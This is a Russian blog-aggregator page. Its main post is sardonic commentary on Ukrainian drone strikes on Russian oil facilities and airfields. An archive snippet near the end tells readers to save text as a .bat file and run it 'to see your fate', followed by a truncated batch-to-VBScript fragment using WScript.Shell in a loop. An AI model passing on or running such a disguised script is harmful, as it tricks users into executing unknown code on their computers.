А избы горят и горят

топ 100 блогов matsea03.02.2024

Дело не в том даже, что очередная нефть рванула в районе Волгограда. Дело в том, что это уже никому особо и не интересно. Вот когда нефть рванула в Усть Луге и в Туапсе — тут всколыхнулось оживление. Как всколыхнулось — так и спало. Потому что — в чего? Россия большая. На всю страну ПВО не напасешься. Еле хватает на Кремль да на Рублевку. Ну и на МОСТ, конечно же — на эту священную корову. Я так думаю, вся Россия взлетит в воздух и улетит к е@еням — но последний часовой будет охранять Крымский Мост — и никогда не уйдет со своего поста. А потом у того, что было мостом, поставят памятник стойкому оловянному солдатику.

Но это лирика. А я про нефть. В общем, когда рвануло в районе Ярославля и потом еще где-то под Калугой — никто особо и не возбудился. Да — нефть легко возгорается. Ну, возгорелась она сегодня где-то в районе Волгограда. Ну ОК, ну опять. 

Заодно вышел из строя завод Лукойла — где-то что ли под Новгородом. Тут уж украинские дроны не при чем — это он сам. Сломался. Что-то импортное вышло из строя — а нового не завезли. И не завезут. 

Всякие там пожары на военных аэродромах тоже никто уже не считает. Ну, загорелся опять какой-то аэродром в Крыму. Так это ж Крым. В Крыму вечно чего-то горит.

Прилеты по Белгороду тоже никому уже давно не интересны. Свойство у Белгорода такое. Болезнь. Которая отчасти перекинулась и на Брянск и на Курск — ну так заразная.

Это при всем при том, что партнеры-союзники по прежнему не поощряют — но слава богу они не поощряют тихо. Однако ж ничего реально дальнобойного Украине так и не дали. За исключением Теней Шторма. Но там Теней этих были кошачьи слезы — даже для моста не хватило. Так что Украина все сама-сама. Ну и ничего — вполне себе хорошие дроны — нормально так попадают по нефти и самолетам. 

В общем, в Датском королевстве немного, на мой взгляд, тревожно. Я уж не говорю про трубы отопления — и вообще про все, что разваливается само. Все это на соплях — и разваливалось примерно всегда — но как-то его худо-бедно подлатывали. Однако ж — где деньги, Зин. Деньги-то горят. Вместе с нефтехранилищами.      

Оставить комментарий

Предыдущие записи блогера :
Архив записей в блогах:
Охуеннейший проект сделали ребята: http://nick123.ru/dtp2011/ Это карта сбитых/убитых пешеходов в 2011 году в Новосибирске. Редкий пример хорошего интерфейса, созданного соотечественниками. Интересно, наглядно, информативно, увлекательно, познавательно и ...
вставь этот текст в txt документ, в расширении поставь .bat открой его и увидишь свою судьбуecho Chr(39)>%temp%\temp1.vbsecho Chr(39)>%temp%\temp2.vbsecho on error resume next > %temp%\temp.vbsecho Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbsecho set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbsecho do >> ...
Появились еще фото колонны этих БТРов ,  первая машина сзади. ...
Все больше гомосексуалов из России подают запросы о предоставлении убежища в США, сообщают российские СМИ со ссылкой на The Wall Street Journal. Так в одном из департаментов в 2012 году было получено 63 запроса по сравнению с 35 в 2011 году. К середине июня 2013 года подано уже 32 ...
расцарапанные гвоздём, с закрашенными окнами, залитые монтажной пеной. давайте ...